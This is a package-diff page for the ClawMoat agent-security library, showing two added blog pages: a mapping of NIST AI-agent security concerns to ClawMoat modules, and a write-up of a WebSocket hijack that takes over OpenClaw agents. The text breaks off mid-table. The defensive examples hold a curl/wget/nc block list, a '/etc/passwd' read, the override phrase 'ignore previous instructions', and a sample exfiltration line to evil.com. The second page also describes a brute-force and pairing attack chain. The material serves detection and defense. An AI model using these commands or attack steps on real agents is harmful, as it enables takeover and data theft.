npm - clawmoat - Versions diffs - 0.5.0 → 0.8.0 - Mend

clawmoat 0.5.0 → 0.8.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (44) hide show

package/CONTRIBUTING.md +4 -2
package/README.md +86 -3
package/SECURITY.md +58 -10
package/bin/clawmoat.js +298 -1
package/clawmoat-0.8.0.tgz +0 -0
package/docs/blog/386-malicious-skills.html +255 -0
package/docs/blog/40000-exposed-openclaw-instances.html +194 -0
package/docs/blog/agent-trust-protocol.html +197 -0
package/docs/blog/clawmoat-vs-llamafirewall-nemo-guardrails.html +223 -0
package/docs/blog/ibm-experts-agent-runtime-protection.html +238 -0
package/docs/blog/index.html +168 -0
package/docs/blog/mcp-30-cves-security-crisis.html +279 -0
package/docs/blog/microsoft-openclaw-workstation-security.html +234 -0
package/docs/blog/nist-ai-agent-standards-clawmoat.html +369 -0
package/docs/blog/oasis-websocket-hijack.html +205 -0
package/docs/blog/ollama-openclaw-security.html +154 -0
package/docs/blog/openclaw-enterprise-readiness-claw10.html +198 -0
package/docs/blog/openclaw-security-reckoning-2026.html +361 -0
package/docs/blog/supply-chain-agents.html +166 -0
package/docs/blog/supply-chain-agents.md +79 -0
package/docs/business/index.html +530 -0
package/docs/business/install.html +247 -0
package/docs/checklist.html +168 -0
package/docs/finance/index.html +217 -0
package/docs/hall-of-fame.html +168 -0
package/docs/index.html +328 -90
package/docs/install.sh +557 -0
package/docs/privacy-policy/index.html +122 -0
package/docs/scan/index.html +214 -0
package/docs/sitemap.xml +132 -2
package/docs/support/index.html +124 -0
package/docs/terms-of-service/index.html +122 -0
package/examples/basic-usage.js +38 -0
package/package.json +1 -1
package/server/index.js +179 -14
package/server/index.js.patch +1 -0
package/src/finance/index.js +585 -0
package/src/finance/mcp-firewall.js +486 -0
package/src/guardian/cve-verify.js +129 -0
package/src/guardian/gateway-monitor.js +590 -0
package/src/guardian/index.js +3 -1
package/src/guardian/insider-threat.js +498 -0
package/src/index.js +3 -0
package/src/middleware/openclaw.js +28 -1

package/docs/blog/nist-ai-agent-standards-clawmoat.html ADDED Viewed

@@ -0,0 +1,369 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<link rel="icon" type="image/png" href="/favicon.png">
+<link rel="apple-touch-icon" href="/apple-touch-icon.png">
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>NIST Is Standardizing AI Agent Security — ClawMoat Already Ships It</title>
+<meta name="description" content="NIST launched the AI Agent Standards Initiative on Feb 20, 2026. Every security concern they raised — least privilege, tool validation, prompt injection, supply chain — ClawMoat already ships as open-source middleware.">
+<meta property="og:title" content="NIST Is Standardizing AI Agent Security — ClawMoat Already Ships It">
+<meta property="og:description" content="Every NIST recommendation maps to a ClawMoat module you can npm install today.">
+<meta property="og:type" content="article">
+<meta property="og:url" content="https://clawmoat.com/blog/nist-ai-agent-standards-clawmoat.html">
+<link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'><text y='.9em' font-size='90'>🏰</text></svg>">
+<style>
+*{margin:0;padding:0;box-sizing:border-box}
+:root{--navy:#0F172A;--navy-light:#1E293B;--navy-mid:#334155;--blue:#3B82F6;--emerald:#10B981;--white:#F8FAFC;--gray:#94A3B8;--red:#EF4444;--amber:#F59E0B}
+body{font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',Roboto,sans-serif;background:var(--navy);color:var(--white);line-height:1.7}
+a{color:var(--blue);text-decoration:none}
+a:hover{text-decoration:underline}
+.container{max-width:760px;margin:0 auto;padding:0 24px}
+nav{position:fixed;top:0;left:0;right:0;z-index:100;background:rgba(15,23,42,.95);backdrop-filter:blur(12px);border-bottom:1px solid rgba(59,130,246,.15);padding:16px 0}
+nav .inner{max-width:760px;margin:0 auto;padding:0 24px;display:flex;align-items:center;justify-content:space-between}
+.logo{font-size:1.25rem;font-weight:700;color:var(--white)}
+.logo span{color:var(--emerald)}
+.nav-links{display:flex;gap:24px}
+.nav-links a{color:var(--gray);font-size:.9rem}
+.nav-links a:hover{color:var(--white);text-decoration:none}
+article{padding:120px 0 80px}
+.meta{color:var(--gray);font-size:.9rem;margin-bottom:32px}
+article h1{font-size:clamp(1.8rem,4vw,2.4rem);font-weight:800;line-height:1.2;margin-bottom:12px;letter-spacing:-.02em}
+article h2{font-size:1.4rem;font-weight:700;margin:48px 0 16px;color:var(--white)}
+article h3{font-size:1.15rem;font-weight:700;margin:32px 0 12px;color:var(--white)}
+article p{color:var(--gray);font-size:1rem;margin-bottom:16px}
+article strong{color:var(--white)}
+article em{color:var(--gray)}
+article ul,article ol{color:var(--gray);margin:0 0 16px 24px}
+article li{margin-bottom:8px}
+article hr{border:none;border-top:1px solid var(--navy-mid);margin:48px 0}
+pre{background:#0a0e17;border:1px solid var(--navy-mid);border-radius:10px;padding:20px;overflow-x:auto;margin:16px 0 24px;font-size:.85rem;line-height:1.7}
+code{font-family:'SF Mono',Consolas,monospace;font-size:.9em}
+pre code{color:var(--gray)}
+p code{background:var(--navy-light);padding:2px 6px;border-radius:4px;font-size:.85em;color:var(--emerald)}
+.nist-box{background:var(--navy-light);border-left:3px solid var(--amber);border-radius:0 10px 10px 0;padding:16px 20px;margin:16px 0}
+.nist-box .label{color:var(--amber);font-weight:700;font-size:.85rem;text-transform:uppercase;letter-spacing:.05em;margin-bottom:6px}
+.nist-box p{margin-bottom:0;font-size:.95rem}
+.ships-box{background:rgba(16,185,129,.06);border-left:3px solid var(--emerald);border-radius:0 10px 10px 0;padding:16px 20px;margin:16px 0}
+.ships-box .label{color:var(--emerald);font-weight:700;font-size:.85rem;text-transform:uppercase;letter-spacing:.05em;margin-bottom:6px}
+.ships-box p{margin-bottom:0;font-size:.95rem}
+table{width:100%;border-collapse:collapse;margin:16px 0 24px;font-size:.9rem}
+th{text-align:left;padding:10px 12px;border-bottom:2px solid var(--navy-mid);color:var(--white);font-weight:600}
+td{padding:8px 12px;border-bottom:1px solid var(--navy-mid);color:var(--gray)}
+tr:hover td{background:rgba(59,130,246,.04)}
+.tags{display:flex;gap:8px;margin-top:32px;flex-wrap:wrap}
+.tag{background:rgba(59,130,246,.12);color:var(--blue);padding:4px 12px;border-radius:20px;font-size:.8rem}
+.back{display:inline-flex;align-items:center;gap:6px;color:var(--gray);font-size:.9rem;margin-bottom:24px}
+.back:hover{color:var(--white);text-decoration:none}
+.cta{background:linear-gradient(135deg,rgba(59,130,246,.15),rgba(16,185,129,.15));border:1px solid rgba(59,130,246,.3);border-radius:12px;padding:32px;margin:32px 0;text-align:center}
+.cta h3{margin-top:0;font-size:1.3rem}
+.cta p{font-size:.95rem}
+.cta code{font-size:1rem}
+.timeline{position:relative;padding-left:24px;margin:16px 0 24px}
+.timeline::before{content:'';position:absolute;left:6px;top:4px;bottom:4px;width:2px;background:var(--navy-mid)}
+.timeline .event{position:relative;margin-bottom:16px}
+.timeline .event::before{content:'';position:absolute;left:-22px;top:6px;width:10px;height:10px;border-radius:50%;background:var(--amber)}
+.timeline .event strong{color:var(--white)}
+footer{border-top:1px solid rgba(255,255,255,.06);padding:32px 0;color:var(--gray);font-size:.85rem;text-align:center}
+</style>
+</head>
+<body>
+<nav>
+  <div class="inner">
+    <a href="/" class="logo">🏰 Claw<span>Moat</span></a>
+    <div class="nav-links">
+      <a href="/">Home</a>
+      <a href="/blog/">Blog</a>
+      <a href="https://github.com/darfaz/clawmoat">GitHub</a>
+    </div>
+  </div>
+</nav>
+<div class="container">
+<article>
+<a href="/blog/" class="back">← Back to Blog</a>
+<h1>NIST Is Standardizing AI Agent Security — ClawMoat Already Ships It</h1>
+<div class="meta">February 28, 2026 · 10 min read</div>
+<p>On February 20, 2026, NIST's Center for AI Standards and Innovation (CAISI) <a href="https://www.nist.gov/news-events/news/2026/02/announcing-ai-agent-standards-initiative-interoperable-and-secure">launched the AI Agent Standards Initiative</a> — the U.S. government's first formal effort to standardize security for autonomous AI agents. The initiative includes an <a href="https://www.nist.gov/news-events/news/2026/01/caisi-issues-request-information-about-securing-ai-agent-systems">RFI on AI Agent Security</a> (docket NIST-2025-0035, comments due March 9), a <a href="https://www.nccoe.nist.gov/projects/software-and-ai-agent-identity-and-authorization">draft concept paper on Agent Identity and Authorization</a> from NCCoE (due April 2), and upcoming listening sessions for healthcare, finance, and education.</p>
+<p>This is a big deal. The federal government is saying: <strong>AI agents that take autonomous actions present unique security challenges</strong>, and we need standards for them.</p>
+<p>We agree. That's why we've been shipping those standards as open-source code since January 2026.</p>
+<p>Here's every security concern NIST raised — and the ClawMoat module that already addresses it.</p>
+<hr>
+<h2>1. Constraining Agent Access in Deployment Environments</h2>
+<div class="nist-box">
+<div class="label">📋 What NIST Says</div>
+<p>The RFI asks about <em>"interventions in deployment environments to address security risks affecting AI agent systems, including methods to <strong>constrain and monitor the extent of agent access</strong> in the deployment environment."</em><br>— <a href="https://www.nist.gov/news-events/news/2026/01/caisi-issues-request-information-about-securing-ai-agent-systems">NIST CAISI RFI, January 2026</a></p>
+</div>
+<div class="ships-box">
+<div class="label">🏰 What ClawMoat Ships</div>
+<p><strong>Host Guardian</strong> — four permission tiers that constrain what an AI agent can do on the host system, from full lockdown to controlled access.</p>
+</div>
+<pre><code>import { createHostGuardian } from 'clawmoat';
+const guardian = createHostGuardian({
+  tier: 'restricted',  // lockdown | restricted | standard | trusted
+  rules: {
+    filesystem: { writable: ['/tmp', './workspace'], blocked: ['~/.ssh', '~/.aws'] },
+    network:    { allowedHosts: ['api.openai.com', 'github.com'] },
+    processes:  { blocked: ['curl', 'wget', 'nc'] },
+    env:        { redact: ['AWS_SECRET_ACCESS_KEY', 'DATABASE_URL'] }
+  }
+});
+// Every agent action passes through the guardian
+const result = await guardian.evaluate({
+  action: 'exec',
+  command: 'cat /etc/passwd'
+});
+// → { allowed: false, reason: 'Path /etc/passwd outside permitted directories' }</code></pre>
+<p>Four tiers from <code>lockdown</code> (zero external access) to <code>trusted</code> (full access with audit logging). Most deployments run <code>restricted</code> — the agent can read docs and call APIs, but can't touch SSH keys, spawn reverse shells, or exfiltrate environment variables.</p>
+<h2>2. Tool Validation and Authorization</h2>
+<div class="nist-box">
+<div class="label">📋 What NIST Says</div>
+<p>The NCCoE concept paper focuses on how to <em>"identify, manage, and authorize access and actions taken by software agents, including AI agents"</em> — specifically, controlling what tools agents can invoke and what those tools can do.<br>— <a href="https://www.nccoe.nist.gov/projects/software-and-ai-agent-identity-and-authorization">NCCoE Draft Concept Paper, February 2026</a></p>
+</div>
+<div class="ships-box">
+<div class="label">🏰 What ClawMoat Ships</div>
+<p><strong>McpFirewall</strong> — intercepts every MCP tool call with allowlisting, read-only enforcement, argument validation, and rate limiting.</p>
+</div>
+<pre><code>import { McpFirewall } from 'clawmoat';
+const firewall = new McpFirewall({
+  tools: {
+    'database_query':  { mode: 'read-only', blocked: ['DROP', 'DELETE', 'TRUNCATE'] },
+    'file_write':      { allowed: false },
+    'web_search':      { rateLimit: { max: 10, windowMs: 60000 } },
+    'send_email':      { requireApproval: true }
+  },
+  defaultPolicy: 'deny'  // Unknown tools are blocked by default
+});
+// Wraps any MCP server
+const safeMcp = firewall.wrap(mcpServer);
+// Agent tries: DELETE FROM users WHERE 1=1
+// → Blocked: write operation matches pattern "DELETE" on read-only tool</code></pre>
+<p>McpFirewall recognizes <strong>29 write-operation patterns</strong> across SQL, filesystem, and API calls. It can enforce read-only mode on database tools while allowing search tools — with per-tool rate limits to prevent data exfiltration through volume.</p>
+<h2>3. Adversarial Data and Prompt Injection</h2>
+<div class="nist-box">
+<div class="label">📋 What NIST Says</div>
+<p><em>"This includes risks from models interacting with adversarial data (such as in <strong>indirect prompt injection</strong>), risks from the use of insecure models (such as models that have been subject to data poisoning)."</em><br>— <a href="https://www.nist.gov/news-events/news/2026/01/caisi-issues-request-information-about-securing-ai-agent-systems">NIST CAISI RFI, January 2026</a></p>
+</div>
+<div class="ships-box">
+<div class="label">🏰 What ClawMoat Ships</div>
+<p><strong>Prompt Injection Scanner</strong> — pattern-based detection of injection attempts in tool outputs, user inputs, and retrieved documents before they reach the model.</p>
+</div>
+<pre><code>import { PromptInjectionScanner } from 'clawmoat';
+const scanner = new PromptInjectionScanner();
+// Scan tool output before feeding it back to the agent
+const toolOutput = await mcpTool.call('web_scrape', { url: untrustedUrl });
+const scan = scanner.scan(toolOutput);
+if (scan.injectionDetected) {
+  console.log(scan.threats);
+  // → [{ type: 'instruction_override', pattern: 'ignore previous instructions',
+  //       severity: 'critical', location: 'line 47' }]
+  // Quarantine or sanitize before passing to model
+}</code></pre>
+<p>The scanner detects role hijacking, instruction overrides, data exfiltration attempts, and encoding-based evasion. It runs in &lt;2ms per scan — fast enough to sit in the hot path of every tool call without latency impact.</p>
+<h2>4. Data Protection and Sensitive Information</h2>
+<div class="nist-box">
+<div class="label">📋 What NIST Says</div>
+<p>The Initiative highlights sector-specific concerns in <strong>healthcare, finance, and education</strong>, with listening sessions planned to identify barriers to secure AI adoption in these regulated industries.<br>— <a href="https://www.nist.gov/caisi/ai-agent-standards-initiative">NIST AI Agent Standards Initiative, February 2026</a></p>
+</div>
+<div class="ships-box">
+<div class="label">🏰 What ClawMoat Ships</div>
+<p><strong>Secret Scanner</strong> and <strong>FinanceGuard</strong> — field-level redaction of credentials, PII, and financial data before it leaves the agent's context.</p>
+</div>
+<pre><code>import { SecretScanner, FinanceGuard } from 'clawmoat';
+// Secret Scanner: catches API keys, tokens, passwords in any text
+const secrets = new SecretScanner();
+const result = secrets.scan(agentOutput);
+// → Detects: AWS keys, GitHub tokens, JWTs, database URLs, SSNs, credit cards
+// FinanceGuard: specialized for financial data in agent workflows
+const finance = new FinanceGuard({
+  redact: ['account_number', 'routing_number', 'ssn', 'credit_card'],
+  audit: true,  // Log every redaction for SOX/PCI compliance
+  allowFields: ['transaction_date', 'amount', 'category']
+});
+const safeOutput = finance.process(agentResponse);
+// "Transfer $5,000 from account 7834-2291-0054 routing 021000021"
+// → "Transfer $5,000 from account [REDACTED] routing [REDACTED]"</code></pre>
+<p>FinanceGuard generates <strong>SOX and PCI-DSS compliance reports</strong> automatically — every redaction is logged with timestamp, field type, and context. When NIST's listening sessions identify requirements for finance-sector AI agents, this is the kind of infrastructure they'll recommend.</p>
+<h2>5. Supply Chain Security</h2>
+<div class="nist-box">
+<div class="label">📋 What NIST Says</div>
+<p><em>"Risks from the use of insecure models (such as models that have been subject to <strong>data poisoning</strong>)"</em> — and more broadly, the NIST AI RMF (AI 600-1) GenAI Profile identifies supply chain integrity as a core risk management action area, with <strong>200+ suggested actions</strong>.<br>— <a href="https://airc.nist.gov/technical-reports/">NIST AI 600-1 GenAI Profile</a></p>
+</div>
+<div class="ships-box">
+<div class="label">🏰 What ClawMoat Ships</div>
+<p><strong>Skill Integrity Checker</strong> — hash verification and behavioral analysis of AI agent skills/plugins before installation.</p>
+</div>
+<pre><code>import { SkillIntegrityChecker } from 'clawmoat';
+const checker = new SkillIntegrityChecker();
+const audit = await checker.scan('./skills/untrusted-plugin/');
+// Checks for 14 suspicious patterns:
+//   - Obfuscated code (base64 decode, eval, Function constructor)
+//   - Network exfiltration (fetch to unknown hosts, DNS tunneling)
+//   - File system access outside workspace
+//   - Environment variable harvesting
+//   - Cryptocurrency mining signatures
+//   - Hidden process spawning
+//   - Permission escalation attempts
+console.log(audit);
+// → { safe: false, threats: 3, details: [
+//      { pattern: 'env_harvesting', file: 'index.js', line: 42,
+//        code: 'Object.entries(process.env).forEach(...)' },
+//      { pattern: 'network_exfil', file: 'utils.js', line: 17,
+//        code: 'fetch("https://evil.com/collect", { body: data })' },
+//      { pattern: 'obfuscated_code', file: 'helper.js', line: 3,
+//        code: 'eval(Buffer.from("...", "base64").toString())' }
+//    ]}</code></pre>
+<p>We've already used this to audit the OpenClaw skill ecosystem and found <a href="/blog/386-malicious-skills.html">386 malicious skills</a> with patterns ranging from credential theft to cryptocurrency mining. The scanner catches what <code>npm audit</code> misses because it analyzes <em>behavior</em>, not just known CVEs.</p>
+<h2>6. Monitoring and Audit Trails</h2>
+<div class="nist-box">
+<div class="label">📋 What NIST Says</div>
+<p>The Initiative's three strategic pillars include <em>"advancing research in areas of AI agent <strong>security and identity</strong> to enable new use cases and to promote <strong>trusted adoption</strong> across sectors."</em> The RFI specifically asks about <em>"methods for <strong>measuring the security</strong> of AI agent systems."</em><br>— <a href="https://www.nist.gov/caisi/ai-agent-standards-initiative">NIST AI Agent Standards Initiative, February 2026</a></p>
+</div>
+<div class="ships-box">
+<div class="label">🏰 What ClawMoat Ships</div>
+<p><strong>Network Egress Logger</strong> and full audit trail with compliance report generation.</p>
+</div>
+<pre><code>import { NetworkEgressLogger, ComplianceReporter } from 'clawmoat';
+// Log every outbound connection the agent makes
+const egress = new NetworkEgressLogger({
+  logFile: './audit/network-egress.jsonl',
+  alertOn: { unknownHosts: true, highVolume: true, unusualPorts: true }
+});
+// Generate compliance reports
+const reporter = new ComplianceReporter({
+  framework: 'SOX',  // or 'PCI-DSS', 'HIPAA'
+  period: 'monthly',
+  include: ['tool_calls', 'data_access', 'redactions', 'blocked_actions']
+});
+const report = await reporter.generate();
+// → Structured report: 4,291 tool calls, 847 redactions,
+//    23 blocked actions, 0 data exfiltration attempts
+//    Exportable as PDF, JSON, or CSV</code></pre>
+<p>Every ClawMoat module writes to a unified audit log. When a regulator asks "what did your AI agent do with customer data last Tuesday?" — you have the answer in milliseconds, not weeks.</p>
+<hr>
+<h2>The Full Mapping</h2>
+<table>
+<thead>
+<tr><th>NIST Concern</th><th>Document</th><th>ClawMoat Module</th><th>Status</th></tr>
+</thead>
+<tbody>
+<tr><td>Constrain agent access</td><td>CAISI RFI</td><td>Host Guardian (4 tiers)</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+<tr><td>Tool authorization</td><td>NCCoE Concept Paper</td><td>McpFirewall</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+<tr><td>Prompt injection</td><td>CAISI RFI</td><td>Prompt Injection Scanner</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+<tr><td>Data protection (PII/financial)</td><td>Listening Sessions</td><td>Secret Scanner + FinanceGuard</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+<tr><td>Supply chain integrity</td><td>AI 600-1 / RFI</td><td>Skill Integrity Checker</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+<tr><td>Security measurement</td><td>CAISI RFI</td><td>Network Egress Logger + Audit</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+<tr><td>Agent identity</td><td>NCCoE Concept Paper</td><td>Audit trail per-agent</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+<tr><td>Sector-specific (finance)</td><td>Listening Sessions</td><td>FinanceGuard + SOX/PCI reports</td><td style="color:var(--emerald)">✅ Shipping</td></tr>
+</tbody>
+</table>
+<h2>What This Means</h2>
+<p>NIST is doing the right thing. AI agents that can <em>"work autonomously for hours, write and debug code, manage emails and calendars, and shop for goods"</em> (their words) need security standards. The RFI, the NCCoE concept paper, the listening sessions — this is how good policy gets made.</p>
+<p>But standards take time. The RFI closes March 9. The concept paper comments close April 2. Guidelines will follow months or years later. Meanwhile, agents are running in production <em>right now</em>, handling real data, making real API calls, accessing real systems.</p>
+<p><strong>We're not waiting for the standards. We're shipping them.</strong></p>
+<p>ClawMoat is open-source, MIT-licensed, and works with any AI agent framework. Every module described above is in npm today. If NIST's final guidelines recommend something we haven't built yet, we'll build it. If they recommend something better than what we have, we'll adopt it.</p>
+<p>But we're not going to leave agents unprotected while the comment period runs.</p>
+<div class="cta">
+<h3>Start Securing Your Agents Today</h3>
+<p>Every NIST recommendation above is available as a single npm install.</p>
+<pre><code>npm install clawmoat</code></pre>
+<p style="margin-top:16px">
+<a href="https://github.com/darfaz/clawmoat" style="color:var(--white);background:var(--blue);padding:10px 24px;border-radius:8px;font-weight:600;display:inline-block;margin:4px">⭐ Star on GitHub</a>
+<a href="/scan/" style="color:var(--white);background:var(--emerald);padding:10px 24px;border-radius:8px;font-weight:600;display:inline-block;margin:4px">🔍 Free Security Scan</a>
+</p>
+</div>
+<div class="tags">
+<span class="tag">NIST</span>
+<span class="tag">CAISI</span>
+<span class="tag">AI-agent-security</span>
+<span class="tag">standards</span>
+<span class="tag">compliance</span>
+<span class="tag">least-privilege</span>
+</div>
+</article>
+</div>
+<footer>
+<div class="container">
+  © 2026 ClawMoat · <a href="https://github.com/darfaz/clawmoat">GitHub</a> · <a href="/privacy-policy/">Privacy</a> · <a href="/terms-of-service/">Terms</a>
+</div>
+</footer>
+</body>
+</html>

package/docs/blog/oasis-websocket-hijack.html ADDED Viewed

@@ -0,0 +1,205 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>Any Website Can Hijack Your OpenClaw Agent — How ClawMoat Detects It | ClawMoat</title>
+<meta name="description" content="Oasis Security found a zero-click attack: any website can take full control of your OpenClaw agent via WebSocket. ClawMoat v0.7.1 now detects this attack.">
+<meta property="og:title" content="Any Website Can Hijack Your OpenClaw Agent — How to Detect and Prevent It">
+<meta property="og:description" content="Oasis Security found a zero-click WebSocket hijack. ClawMoat v0.7.1 adds gateway monitoring to detect brute-force attacks and unauthorized device pairings.">
+<meta property="og:type" content="article">
+<meta property="og:url" content="https://clawmoat.com/blog/oasis-websocket-hijack.html">
+<link rel="canonical" href="https://clawmoat.com/blog/oasis-websocket-hijack.html">
+<style>
+  :root { --bg: #0a0a0f; --fg: #e0e0e8; --accent: #00d4aa; --muted: #888; --card: #14141f; --red: #ff4444; }
+  * { margin:0; padding:0; box-sizing:border-box; }
+  body { background:var(--bg); color:var(--fg); font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',Roboto,sans-serif; line-height:1.7; }
+  .container { max-width:740px; margin:0 auto; padding:2rem 1.5rem; }
+  h1 { font-size:2.2rem; line-height:1.2; margin-bottom:.5rem; }
+  .meta { color:var(--muted); margin-bottom:2rem; }
+  h2 { color:var(--accent); margin:2rem 0 1rem; font-size:1.5rem; }
+  h3 { margin:1.5rem 0 .75rem; font-size:1.2rem; }
+  p { margin-bottom:1rem; }
+  a { color:var(--accent); }
+  code { background:#1a1a2e; padding:.15em .4em; border-radius:4px; font-size:.9em; }
+  pre { background:#1a1a2e; padding:1.25rem; border-radius:8px; overflow-x:auto; margin:1rem 0; }
+  pre code { background:none; padding:0; }
+  blockquote { border-left:3px solid var(--accent); padding-left:1rem; margin:1rem 0; color:#bbb; font-style:italic; }
+  .warning { background:#2a1a1a; border:1px solid var(--red); border-radius:8px; padding:1.25rem; margin:1.5rem 0; }
+  .warning h3 { color:var(--red); margin-top:0; }
+  .cta { background:var(--accent); color:#000; padding:.75rem 1.5rem; border-radius:6px; text-decoration:none; font-weight:600; display:inline-block; margin:1rem .5rem 1rem 0; }
+  .cta-outline { border:1px solid var(--accent); color:var(--accent); background:transparent; padding:.75rem 1.5rem; border-radius:6px; text-decoration:none; font-weight:600; display:inline-block; margin:1rem 0; }
+  ul, ol { margin:0 0 1rem 1.5rem; }
+  li { margin-bottom:.5rem; }
+  .nav { padding:1rem 0; border-bottom:1px solid #2a2a3a; margin-bottom:2rem; }
+  .nav a { color:var(--fg); text-decoration:none; margin-right:1.5rem; }
+  .nav a:hover { color:var(--accent); }
+  .attack-chain { background:var(--card); border:1px solid #2a2a3a; border-radius:8px; padding:1.5rem; margin:1.5rem 0; }
+  .attack-step { display:flex; align-items:flex-start; margin:.75rem 0; }
+  .step-num { background:var(--red); color:#fff; width:28px; height:28px; border-radius:50%; display:flex; align-items:center; justify-content:center; font-weight:bold; font-size:.85rem; flex-shrink:0; margin-right:12px; margin-top:2px; }
+  .step-text { flex:1; }
+  .new-badge { background:var(--accent); color:#000; padding:2px 8px; border-radius:4px; font-size:.75rem; font-weight:bold; }
+  table { width:100%; border-collapse:collapse; margin:1rem 0; }
+  th, td { padding:.6rem .8rem; text-align:left; border-bottom:1px solid #2a2a3a; }
+  th { color:var(--accent); font-weight:600; }
+</style>
+</head>
+<body>
+<div class="container">
+<nav class="nav">
+  <a href="/">ClawMoat</a>
+  <a href="/blog/">Blog</a>
+  <a href="https://github.com/darfaz/clawmoat">GitHub</a>
+</nav>
+<article>
+<h1>Any Website Can Hijack Your OpenClaw Agent — and ClawMoat Now Detects It</h1>
+<p class="meta">February 27, 2026 · 8 min read · <span class="new-badge">v0.7.1</span></p>
+<div class="warning">
+<h3>🚨 Critical Vulnerability Disclosed</h3>
+<p>Oasis Security published research showing that <strong>any website can silently take full control of an OpenClaw agent</strong> running on localhost. No plugins, no extensions, no user interaction required. <a href="https://www.oasis.security/blog/openclaw-vulnerability">Full research →</a></p>
+</div>
+<p>This is the most serious OpenClaw vulnerability disclosed to date. Unlike previous attacks that required exposed ports, malicious skills, or crafted messages, this one requires <strong>nothing except visiting a website</strong>.</p>
+<p>We've shipped ClawMoat v0.7.1 with a new <code>GatewayMonitor</code> module specifically designed to detect this attack pattern.</p>
+<h2>The Attack Chain</h2>
+<div class="attack-chain">
+  <div class="attack-step"><div class="step-num">1</div><div class="step-text">Developer has OpenClaw running on localhost (the default setup)</div></div>
+  <div class="attack-step"><div class="step-num">2</div><div class="step-text">Developer visits any malicious or compromised website</div></div>
+  <div class="attack-step"><div class="step-num">3</div><div class="step-text">JavaScript opens a WebSocket to localhost on OpenClaw's gateway port — <strong>browsers don't enforce CORS on WebSocket connections</strong></div></div>
+  <div class="attack-step"><div class="step-num">4</div><div class="step-text">Script brute-forces the gateway password at hundreds of attempts/second — <strong>the rate limiter exempts localhost connections</strong></div></div>
+  <div class="attack-step"><div class="step-num">5</div><div class="step-text">Once authenticated, registers as a trusted device — <strong>gateway auto-approves pairings from localhost</strong></div></div>
+  <div class="attack-step"><div class="step-num">6</div><div class="step-text"><strong>Full agent takeover:</strong> read messages, exfiltrate files, execute shell commands on any paired device</div></div>
+</div>
+<p>Oasis Security <a href="https://www.youtube.com/watch?v=A15fuHs7fOc">demonstrated this end-to-end</a> — from a browser tab to full agent control in seconds.</p>
+<h2>Three Failures That Enable the Attack</h2>
+<ol>
+  <li><strong>No rate limiting on localhost</strong> — The gateway's rate limiter exempts connections from 127.0.0.1, allowing unlimited brute-force attempts</li>
+  <li><strong>Auto-approve localhost pairings</strong> — New device registrations from localhost are automatically approved without user confirmation</li>
+  <li><strong>WebSocket to localhost is unrestricted</strong> — Browsers don't enforce same-origin policy on WebSocket connections to localhost</li>
+</ol>
+<p>Each alone would be a concern. Combined, they create a zero-click full takeover from any browser tab.</p>
+<h2>How ClawMoat v0.7.1 Detects This</h2>
+<p>We shipped a new <code>GatewayMonitor</code> module with four detection capabilities:</p>
+<h3>1. Brute-Force Detection</h3>
+<pre><code>const { GatewayMonitor } = require('clawmoat');
+const monitor = new GatewayMonitor({
+  bruteForceThreshold: 10,  // Alert after 10 failed attempts
+  bruteForceWindowMs: 60000, // Within 60 seconds
+  onAlert: (alert) => {
+    console.error('🚨 SECURITY ALERT:', alert.message);
+    // Send to webhook, Slack, Discord, etc.
+  }
+});
+// Hook into your gateway auth handler
+monitor.recordAuthAttempt({
+  source: req.ip,
+  success: false,
+  origin: req.headers.origin  // Detects cross-origin attacks
+});</code></pre>
+<p>The monitor tracks authentication attempts per source and time window. When the threshold is exceeded, it fires a <code>brute_force_detected</code> alert with severity <code>critical</code>.</p>
+<h3>2. Suspicious WebSocket Origin Detection</h3>
+<p>The key insight from the Oasis research: the attack comes via a WebSocket from a <em>different</em> website. ClawMoat flags any WebSocket connection with a non-localhost origin:</p>
+<pre><code>// Automatically flagged as suspicious:
+// Origin: https://evil-site.com → WebSocket to localhost:18789
+// Alert: "WebSocket connection from suspicious origin"</code></pre>
+<h3>3. Device Pairing Alerts</h3>
+<pre><code>monitor.recordDevicePairing({
+  deviceId: 'unknown-device-xyz',
+  source: 'localhost',
+  autoApproved: true
+});
+// → CRITICAL alert: "Localhost auto-approve is the exact vector
+//    used in the Oasis WebSocket hijack"</code></pre>
+<h3>4. Gateway Configuration Audit</h3>
+<pre><code>const audit = monitor.auditGatewayConfig();
+// Checks for:
+// - Weak/missing gateway password
+// - Binding to all interfaces (0.0.0.0)
+// - Auto-approve enabled
+// - Localhost exempt from rate limiting
+// - Default port usage
+console.log('Security score:', audit.score + '/100');
+console.log('Oasis vulnerable:', audit.oasisVulnerable);</code></pre>
+<h2>What You Should Do Right Now</h2>
+<h3>Immediate (5 minutes)</h3>
+<ol>
+  <li><strong>Change your gateway password</strong> to 32+ characters:
+    <pre><code>node -e "console.log(require('crypto').randomBytes(32).toString('hex'))"</code></pre>
+  </li>
+  <li><strong>Check for unknown paired devices</strong> in your OpenClaw dashboard</li>
+  <li><strong>Disable auto-approve</strong> for device pairings</li>
+</ol>
+<h3>Short-term (this week)</h3>
+<ol>
+  <li>Install ClawMoat for monitoring:
+    <pre><code>npm install clawmoat@0.7.1</code></pre>
+  </li>
+  <li>Bind to a Tailscale/VPN IP instead of localhost</li>
+  <li>Use a non-default gateway port</li>
+  <li>Enable rate limiting for ALL connections, including localhost</li>
+</ol>
+<h3>Generate a hardened config</h3>
+<pre><code>const { GatewayMonitor } = require('clawmoat');
+const config = GatewayMonitor.getHardenedConfig();
+console.log(JSON.stringify(config, null, 2));
+// Outputs config with:
+// - 64-char random token
+// - Non-default port
+// - Auto-approve disabled
+// - Localhost rate limiting enabled</code></pre>
+<h2>The Bigger Picture: Four Attack Vectors in One Month</h2>
+<table>
+<tr><th>Attack</th><th>Vector</th><th>Impact</th><th>ClawMoat Detection</th></tr>
